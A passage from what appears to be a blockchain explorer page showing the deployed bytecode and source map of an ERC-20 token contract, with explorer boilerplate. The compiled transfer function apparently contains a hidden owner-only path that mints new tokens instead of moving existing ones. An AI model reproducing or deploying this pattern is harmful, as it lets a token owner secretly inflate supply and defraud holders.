66654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b61169f8161131b565b81146116aa57600080fd5b50565b6116b681611359565b81146116c157600080fd5b5056fea2646970667358221220b34a3df858673e6c1a49f505d0e7eba791608b0c98ff497e76d0170ae29bdb1c64736f6c63430008040033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100a95760003560e01c80633950935111610071578063395093511461016857806370a082311461019857806395d89b41146101c8578063a457c2d7146101e6578063a9059cbb14610216578063dd62ed3e14610246576100a9565b806306fdde03146100ae578063095ea7b3146100cc57806318160ddd146100fc57806323b872dd1461011a578063313ce5671461014a575b600080fd5b6100b6610276565b6040516100c3919061111d565b60405180910390f35b6100e660048036038101906100e19190610f48565b610308565b6040516100f39190611102565b60405180910390f35b610104610326565b604051610111919061123f565b60405180910390f35b610134600480360381019061012f9190610ef9565b610330565b6040516101419190611102565b60405180910390f35b610152610431565b60405161015f919061125a565b60405180910390f35b610182600480360381019061017d9190610f48565b610459565b60405161018f9190611102565b60405180910390f35b6101b260048036038101906101ad9190610e94565b610505565b6040516101bf919061123f565b60405180910390f35b6101d061054e565b6040516101dd919061111d565b60405180910390f35b61020060048036038101906101fb9190610f48565b6105e0565b60405161020d9190611102565b60405180910390f35b610230600480360381019061022b9190610f48565b6106d4565b60405161023d9190611102565b60405180910390f35b610260600480360381019061025b9190610ebd565b61093b565b60405161026d919061123f565b60405180910390f35b606060048054610285906113a3565b80601f01602080910402602001604051908101604052809291908181526020018280546102b1906113a3565b80156102fe5780601f106102d3576101008083540402835291602001916102fe565b820191906000526020600020905b8154815290600101906020018083116102e157829003601f168201915b5050505050905090565b600061031c6103156109c2565b84846109ca565b6001905092915050565b6000600354905090565b600061033d848484610b95565b6000600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006103886109c2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610408576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016103ff906111bf565b60405180910390fd5b610425856104146109c2565b858461042091906112e7565b6109ca565b60019150509392505050565b60007f0000000000000000000000000000000000000000000000000000000000000012905090565b60006104fb6104666109c2565b8484600260006104746109c2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546104f69190611291565b6109ca565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60606005805461055d906113a3565b80601f0160208091040260200160405190810160405280929190818152602001828054610589906113a3565b80156105d65780601f106105ab576101008083540402835291602001916105d6565b820191906000526020600020905b8154815290600101906020018083116105b957829003601f168201915b5050505050905090565b600080600260006105ef6109c2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156106ac576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106a39061121f565b60405180910390fd5b6106c96106b76109c2565b8585846106c491906112e7565b6109ca565b600191505092915050565b60006106de6109c2565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614801561074b575060011515600660009054906101000a900460ff161515145b156107865761076261075b6109c2565b8484610b95565b6000600660006101000a81548160ff02191690831515021790555060019050610935565b61078e6109c2565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161480156107fb575060001515600660009054906101000a900460ff161515145b1561091e5761081582600354610e0c90919063ffffffff16565b60038190555061086d82600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e0c90919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161090d919061123f565b60405180910390a360019050610935565b6109306109296109c2565b8484610b95565b600190505b92915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610a3a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a31906111ff565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610aaa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aa19061115f565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b88919061123f565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c05576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bfc906111df565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610c75576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c6c9061113f565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610cfc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cf39061119f565b60405180910390fd5b8181610d0891906112e7565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610d9a9190611291565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610dfe919061123f565b60405180910390a350505050565b6000808284610e1b9190611291565b905083811015610e60576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e579061117f565b60405180910390fd5b8091505092915050565b600081359050610e7981611696565b92915050565b600081359050610e8e816116ad565b92915050565b600060208284031215610ea657600080fd5b6000610eb484828501610e6a565b91505092915050565b60008060408385031215610ed057600080fd5b6000610ede85828601610e6a565b9250506020610eef85828601610e6a565b9150509250929050565b600080600060608486031215610f0e57600080fd5b6000610f1c86828701610e6a565b9350506020610f2d86828701610e6a565b9250506040610f3e86828701610e7f565b9150509250925092565b60008060408385031215610f5b57600080fd5b6000610f6985828601610e6a565b9250506020610f7a85828601610e7f565b9150509250929050565b610f8d8161132d565b82525050565b6000610f9e82611275565b610fa88185611280565b9350610fb8818560208601611370565b610fc181611433565b840191505092915050565b6000610fd9602383611280565b9150610fe482611444565b604082019050919050565b6000610ffc602283611280565b915061100782611493565b604082019050919050565b600061101f601b83611280565b915061102a826114e2565b602082019050919050565b6000611042602683611280565b915061104d8261150b565b604082019050919050565b6000611065602883611280565b91506110708261155a565b604082019050919050565b6000611088602583611280565b9150611093826115a9565b604082019050919050565b60006110ab602483611280565b91506110b6826115f8565b604082019050919050565b60006110ce602583611280565b91506110d982611647565b604082019050919050565b6110ed81611359565b82525050565b6110fc81611363565b82525050565b60006020820190506111176000830184610f84565b92915050565b600060208201905081810360008301526111378184610f93565b905092915050565b6000602082019050818103600083015261115881610fcc565b9050919050565b6000602082019050818103600083015261117881610fef565b9050919050565b6000602082019050818103600083015261119881611012565b9050919050565b600060208201905081810360008301526111b881611035565b9050919050565b600060208201905081810360008301526111d881611058565b9050919050565b600060208201905081810360008301526111f88161107b565b9050919050565b600060208201905081810360008301526112188161109e565b9050919050565b60006020820190508181036000830152611238816110c1565b9050919050565b600060208201905061125460008301846110e4565b92915050565b600060208201905061126f60008301846110f3565b92915050565b600081519050919050565b600082825260208201905092915050565b600061129c82611359565b91506112a783611359565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156112dc576112db6113d5565b5b828201905092915050565b60006112f282611359565b91506112fd83611359565b9250828210156113105761130f6113d5565b5b828203905092915050565b600061132682611339565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b8381101561138e578082015181840152602081019050611373565b8381111561139d576000848401525b50505050565b600060028204905060018216806113bb57607f821691505b602082108114156113cf576113ce611404565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b61169f8161131b565b81146116aa57600080fd5b50565b6116b681611359565b81146116c157600080fd5b5056fea2646970667358221220b34a3df858673e6c1a49f505d0e7eba791608b0c98ff497e76d0170ae29bdb1c64736f6c63430008040033

Deployed Bytecode Sourcemap

15631:516:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6578:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9075:169;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7698:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9726:420;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16044:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10561:215;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7869:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6797:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11279:377;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8209:505;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8777:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6578:100;6632:13;6665:5;6658:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6578:100;:::o;9075:169::-;9158:4;9175:39;9184:12;:10;:12::i;:::-;9198:7;9207:6;9175:8;:39::i;:::-;9232:4;9225:11;;9075:169;;;;:::o;7698:108::-;7759:7;7786:12;;7779:19;;7698:108;:::o;9726:420::-;9832:4;9849:36;9859:6;9867:9;9878:6;9849:9;:36::i;:::-;9896:24;9923:11;:19;9935:6;9923:19;;;;;;;;;;;;;;;:33;9943:12;:10;:12::i;:::-;9923:33;;;;;;;;;;;;;;;;9896:60;;9995:6;9975:16;:26;;9967:79;;;;;;;;;;;;:::i;:::-;;;;;;;;;10057:57;10066:6;10074:12;:10;:12::i;:::-;10107:6;10088:16;:25;;;;:::i;:::-;10057:8;:57::i;:::-;10134:4;10127:11;;;9726:420;;;;;:::o;16044:100::-;16102:5;16127:9;16120:16;;16044:100;:::o;10561:215::-;10649:4;10666:80;10675:12;:10;:12::i;:::-;10689:7;10735:10;10698:11;:25;10710:12;:10;:12::i;:::-;10698:25;;;;;;;;;;;;;;;:34;10724:7;10698:34;;;;;;;;;;;;;;;;:47;;;;:::i;:::-;10666:8;:80::i;:::-;10764:4;10757:11;;10561:215;;;;:::o;7869:127::-;7943:7;7970:9;:18;7980:7;7970:18;;;;;;;;;;;;;;;;7963:25;;7869:127;;;:::o;6797:104::-;6853:13;6886:7;6879:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6797:104;:::o;11279:377::-;11372:4;11389:24;11416:11;:25;11428:12;:10;:12::i;:::-;11416:25;;;;;;;;;;;;;;;:34;11442:7;11416:34;;;;;;;;;;;;;;;;11389:61;;11489:15;11469:16;:35;;11461:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;11557:67;11566:12;:10;:12::i;:::-;11580:7;11608:15;11589:16;:34;;;;:::i;:::-;11557:8;:67::i;:::-;11644:4;11637:11;;;11279:377;;;;:::o;8209:505::-;8288:4;8323:12;:10;:12::i;:::-;8309:26;;:10;;;;;;;;;;:26;;;8308:44;;;;;8347:4;8341:10;;:4;;;;;;;;;;;:10;;;8308:44;8305:402;;;8354:42;8364:12;:10;:12::i;:::-;8378:9;8389:6;8354:9;:42::i;:::-;8403:5;8398:4;;:10;;;;;;;;;;;;;;;;;;8416:4;8409:11;;;;8305:402;8455:12;:10;:12::i;:::-;8441:26;;:10;;;;;;;;;;:26;;;8440:45;;;;;8479:5;8473:11;;:4;;;;;;;;;;;:11;;;8440:45;8437:270;;;8500:23;8516:6;8500:12;;:15;;:23;;;;:::i;:::-;8487:12;:36;;;;8545:31;8569:6;8545:9;:20;8555:9;8545:20;;;;;;;;;;;;;;;;:23;;:31;;;;:::i;:::-;8524:9;:20;8534:9;8524:20;;;;;;;;;;;;;;;:52;;;;8602:9;8582:38;;8591:9;8582:38;;;8613:6;8582:38;;;;;;:::i;:::-;;;;;;;;8629:4;8622:11;;;;8437:270;8650:42;8660:12;:10;:12::i;:::-;8674:9;8685:6;8650:9;:42::i;:::-;8701:4;8694:11;;8209:505;;;;;:::o;8777:151::-;8866:7;8893:11;:18;8905:5;8893:18;;;;;;;;;;;;;;;:27;8912:7;8893:27;;;;;;;;;;;;;;;;8886:34;;8777:151;;;;:::o;3821:98::-;3874:7;3901:10;3894:17;;3821:98;:::o;14451:346::-;14570:1;14553:19;;:5;:19;;;;14545:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;14651:1;14632:21;;:7;:21;;;;14624:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;14735:6;14705:11;:18;14717:5;14705:18;;;;;;;;;;;;;;;:27;14724:7;14705:27;;;;;;;;;;;;;;;:36;;;;14773:7;14757:32;;14766:5;14757:32;;;14782:6;14757:32;;;;;;:::i;:::-;;;;;;;;14451:346;;;:::o;12146:542::-;12270:1;12252:20;;:6;:20;;;;12244:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;12354:1;12333:23;;:9;:23;;;;12325:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;12407:21;12431:9;:17;12441:6;12431:17;;;;;;;;;;;;;;;;12407:41;;12484:6;12467:13;:23;;12459:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;12580:6;12564:13;:22;;;;:::i;:::-;12544:9;:17;12554:6;12544:17;;;;;;;;;;;;;;;:42;;;;12621:6;12597:9;:20;12607:9;12597:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;12662:9;12645:35;;12654:6;12645:35;;;12673:6;12645:35;;;;;;:::i;:::-;;;;;;;;12146:542;;;;:::o;3596:180::-;3653:7;3673:9;3689:1;3685;:5;;;;:::i;:::-;3673:17;;3714:1;3709;:6;;3701:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;3767:1;3760:8;;;3596:180;;;;:::o;7:139:1:-;53:5;91:6;78:20;69:29;;107:33;134:5;107:33;:::i;:::-;59:87;;;;:::o;152:139::-;198:5;236:6;223:20;214:29;;252:33;279:5;252:33;:::i;:::-;204:87;;;;:::o;297:262::-;356:6;405:2;393:9;384:7;380:23;376:32;373:2;;;421:1;418;411:12;373:2;464:1;489:53;534:7;525:6;514:9;510:22;489:53;:::i;:::-;479:63;;435:117;363:196;;;;:::o;565:407::-;633:6;641;690:2;678:9;669:7;665:23;661:32;658:2;;;706:1;703;696:12;658:2;749:1;774:53;819:7;810:6;799:9;795:22;774:53;:::i;:::-;764:63;;720:117;876:2;902:53;947:7;938:6;927:9;923:22;902:53;:::i;:::-;892:63;;847:118;648:324;;;;;:::o;978:552::-;1055:6;1063;1071;1120:2;1108:9;1099:7;1095:23;1091:32;1088:2;;;1136:1;1133;1126:12;1088:2;1179:1;1204:53;1249:7;1240:6;1229:9;1225:22;1204:53;:::i;:::-;1194:63;;1150:117;1306:2;1332:53;1377:7;1368:6;1357:9;1353:22;1332:53;:::i;:::-;1322:63;;1277:118;1434:2;1460:53;1505:7;1496:6;1485:9;1481:22;1460:53;:::i;:::-;1450:63;;1405:118;1078:452;;;;;:::o;1536:407::-;1604:6;1612;1661:2;1649:9;1640:7;1636:23;1632:32;1629:2;;;1677:1;1674;1667:12;1629:2;1720:1;1745:53;1790:7;1781:6;1770:9;1766:22;1745:53;:::i;:::-;1735:63;;1691:117;1847:2;1873:53;1918:7;1909:6;1898:9;1894:22;1873:53;:::i;:::-;1863:63;;1818:118;1619:324;;;;;:::o;1949:109::-;2030:21;2045:5;2030:21;:::i;:::-;2025:3;2018:34;2008:50;;:::o;2064:364::-;2152:3;2180:39;2213:5;2180:39;:::i;:::-;2235:71;2299:6;2294:3;2235:71;:::i;:::-;2228:78;;2315:52;2360:6;2355:3;2348:4;2341:5;2337:16;2315:52;:::i;:::-;2392:29;2414:6;2392:29;:::i;:::-;2387:3;2383:39;2376:46;;2156:272;;;;;:::o;2434:366::-;2576:3;2597:67;2661:2;2656:3;2597:67;:::i;:::-;2590:74;;2673:93;2762:3;2673:93;:::i;:::-;2791:2;2786:3;2782:12;2775:19;;2580:220;;;:::o;2806:366::-;2948:3;2969:67;3033:2;3028:3;2969:67;:::i;:::-;2962:74;;3045:93;3134:3;3045:93;:::i;:::-;3163:2;3158:3;3154:12;3147:19;;2952:220;;;:::o;3178:366::-;3320:3;3341:67;3405:2;3400:3;3341:67;:::i;:::-;3334:74;;3417:93;3506:3;3417:93;:::i;:::-;3535:2;3530:3;3526:12;3519:19;;3324:220;;;:::o;3550:366::-;3692:3;3713:67;3777:2;3772:3;3713:67;:::i;:::-;3706:74;;3789:93;3878:3;3789:93;:::i;:::-;3907:2;3902:3;3898:12;3891:19;;3696:220;;;:::o;3922:366::-;4064:3;4085:67;4149:2;4144:3;4085:67;:::i;:::-;4078:74;;4161:93;4250:3;4161:93;:::i;:::-;4279:2;4274:3;4270:12;4263:19;;4068:220;;;:::o;4294:366::-;4436:3;4457:67;4521:2;4516:3;4457:67;:::i;:::-;4450:74;;4533:93;4622:3;4533:93;:::i;:::-;4651:2;4646:3;4642:12;4635:19;;4440:220;;;:::o;4666:366::-;4808:3;4829:67;4893:2;4888:3;4829:67;:::i;:::-;4822:74;;4905:93;4994:3;4905:93;:::i;:::-;5023:2;5018:3;5014:12;5007:19;;4812:220;;;:::o;5038:366::-;5180:3;5201:67;5265:2;5260:3;5201:67;:::i;:::-;5194:74;;5277:93;5366:3;5277:93;:::i;:::-;5395:2;5390:3;5386:12;5379:19;;5184:220;;;:::o;5410:118::-;5497:24;5515:5;5497:24;:::i;:::-;5492:3;5485:37;5475:53;;:::o;5534:112::-;5617:22;5633:5;5617:22;:::i;:::-;5612:3;5605:35;5595:51;;:::o;5652:210::-;5739:4;5777:2;5766:9;5762:18;5754:26;;5790:65;5852:1;5841:9;5837:17;5828:6;5790:65;:::i;:::-;5744:118;;;;:::o;5868:313::-;5981:4;6019:2;6008:9;6004:18;5996:26;;6068:9;6062:4;6058:20;6054:1;6043:9;6039:17;6032:47;6096:78;6169:4;6160:6;6096:78;:::i;:::-;6088:86;;5986:195;;;;:::o;6187:419::-;6353:4;6391:2;6380:9;6376:18;6368:26;;6440:9;6434:4;6430:20;6426:1;6415:9;6411:17;6404:47;6468:131;6594:4;6468:131;:::i;:::-;6460:139;;6358:248;;;:::o;6612:419::-;6778:4;6816:2;6805:9;6801:18;6793:26;;6865:9;6859:4;6855:20;6851:1;6840:9;6836:17;6829:47;6893:131;7019:4;6893:131;:::i;:::-;6885:139;;6783:248;;;:::o;7037:419::-;7203:4;7241:2;7230:9;7226:18;7218:26;;7290:9;7284:4;7280:20;7276:1;7265:9;7261:17;7254:47;7318:131;7444:4;7318:131;:::i;:::-;7310:139;;7208:248;;;:::o;7462:419::-;7628:4;7666:2;7655:9;7651:18;7643:26;;7715:9;7709:4;7705:20;7701:1;7690:9;7686:17;7679:47;7743:131;7869:4;7743:131;:::i;:::-;7735:139;;7633:248;;;:::o;7887:419::-;8053:4;8091:2;8080:9;8076:18;8068:26;;8140:9;8134:4;8130:20;8126:1;8115:9;8111:17;8104:47;8168:131;8294:4;8168:131;:::i;:::-;8160:139;;8058:248;;;:::o;8312:419::-;8478:4;8516:2;8505:9;8501:18;8493:26;;8565:9;8559:4;8555:20;8551:1;8540:9;8536:17;8529:47;8593:131;8719:4;8593:131;:::i;:::-;8585:139;;8483:248;;;:::o;8737:419::-;8903:4;8941:2;8930:9;8926:18;8918:26;;8990:9;8984:4;8980:20;8976:1;8965:9;8961:17;8954:47;9018:131;9144:4;9018:131;:::i;:::-;9010:139;;8908:248;;;:::o;9162:419::-;9328:4;9366:2;9355:9;9351:18;9343:26;;9415:9;9409:4;9405:20;9401:1;9390:9;9386:17;9379:47;9443:131;9569:4;9443:131;:::i;:::-;9435:139;;9333:248;;;:::o;9587:222::-;9680:4;9718:2;9707:9;9703:18;9695:26;;9731:71;9799:1;9788:9;9784:17;9775:6;9731:71;:::i;:::-;9685:124;;;;:::o;9815:214::-;9904:4;9942:2;9931:9;9927:18;9919:26;;9955:67;10019:1;10008:9;10004:17;9995:6;9955:67;:::i;:::-;9909:120;;;;:::o;10035:99::-;10087:6;10121:5;10115:12;10105:22;;10094:40;;;:::o;10140:169::-;10224:11;10258:6;10253:3;10246:19;10298:4;10293:3;10289:14;10274:29;;10236:73;;;;:::o;10315:305::-;10355:3;10374:20;10392:1;10374:20;:::i;:::-;10369:25;;10408:20;10426:1;10408:20;:::i;:::-;10403:25;;10562:1;10494:66;10490:74;10487:1;10484:81;10481:2;;;10568:18;;:::i;:::-;10481:2;10612:1;10609;10605:9;10598:16;;10359:261;;;;:::o;10626:191::-;10666:4;10686:20;10704:1;10686:20;:::i;:::-;10681:25;;10720:20;10738:1;10720:20;:::i;:::-;10715:25;;10759:1;10756;10753:8;10750:2;;;10764:18;;:::i;:::-;10750:2;10809:1;10806;10802:9;10794:17;;10671:146;;;;:::o;10823:96::-;10860:7;10889:24;10907:5;10889:24;:::i;:::-;10878:35;;10868:51;;;:::o;10925:90::-;10959:7;11002:5;10995:13;10988:21;10977:32;;10967:48;;;:::o;11021:126::-;11058:7;11098:42;11091:5;11087:54;11076:65;;11066:81;;;:::o;11153:77::-;11190:7;11219:5;11208:16;;11198:32;;;:::o;11236:86::-;11271:7;11311:4;11304:5;11300:16;11289:27;;11279:43;;;:::o;11328:307::-;11396:1;11406:113;11420:6;11417:1;11414:13;11406:113;;;11505:1;11500:3;11496:11;11490:18;11486:1;11481:3;11477:11;11470:39;11442:2;11439:1;11435:10;11430:15;;11406:113;;;11537:6;11534:1;11531:13;11528:2;;;11617:1;11608:6;11603:3;11599:16;11592:27;11528:2;11377:258;;;;:::o;11641:320::-;11685:6;11722:1;11716:4;11712:12;11702:22;;11769:1;11763:4;11759:12;11790:18;11780:2;;11846:4;11838:6;11834:17;11824:27;;11780:2;11908;11900:6;11897:14;11877:18;11874:38;11871:2;;;11927:18;;:::i;:::-;11871:2;11692:269;;;;:::o;11967:180::-;12015:77;12012:1;12005:88;12112:4;12109:1;12102:15;12136:4;12133:1;12126:15;12153:180;12201:77;12198:1;12191:88;12298:4;12295:1;12288:15;12322:4;12319:1;12312:15;12339:102;12380:6;12431:2;12427:7;12422:2;12415:5;12411:14;12407:28;12397:38;;12387:54;;;:::o;12447:222::-;12587:34;12583:1;12575:6;12571:14;12564:58;12656:5;12651:2;12643:6;12639:15;12632:30;12553:116;:::o;12675:221::-;12815:34;12811:1;12803:6;12799:14;12792:58;12884:4;12879:2;12871:6;12867:15;12860:29;12781:115;:::o;12902:177::-;13042:29;13038:1;13030:6;13026:14;13019:53;13008:71;:::o;13085:225::-;13225:34;13221:1;13213:6;13209:14;13202:58;13294:8;13289:2;13281:6;13277:15;13270:33;13191:119;:::o;13316:227::-;13456:34;13452:1;13444:6;13440:14;13433:58;13525:10;13520:2;13512:6;13508:15;13501:35;13422:121;:::o;13549:224::-;13689:34;13685:1;13677:6;13673:14;13666:58;13758:7;13753:2;13745:6;13741:15;13734:32;13655:118;:::o;13779:223::-;13919:34;13915:1;13907:6;13903:14;13896:58;13988:6;13983:2;13975:6;13971:15;13964:31;13885:117;:::o;14008:224::-;14148:34;14144:1;14136:6;14132:14;14125:58;14217:7;14212:2;14204:6;14200:15;14193:32;14114:118;:::o;14238:122::-;14311:24;14329:5;14311:24;:::i;:::-;14304:5;14301:35;14291:2;;14350:1;14347;14340:12;14291:2;14281:79;:::o;14366:122::-;14439:24;14457:5;14439:24;:::i;:::-;14432:5;14429:35;14419:2;;14478:1;14475;14468:12;14419:2;14409:79;:::o

Swarm Source

ipfs://b34a3df858673e6c1a49f505d0e7eba791608b0c98ff497e76d0170ae29bdb1c

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.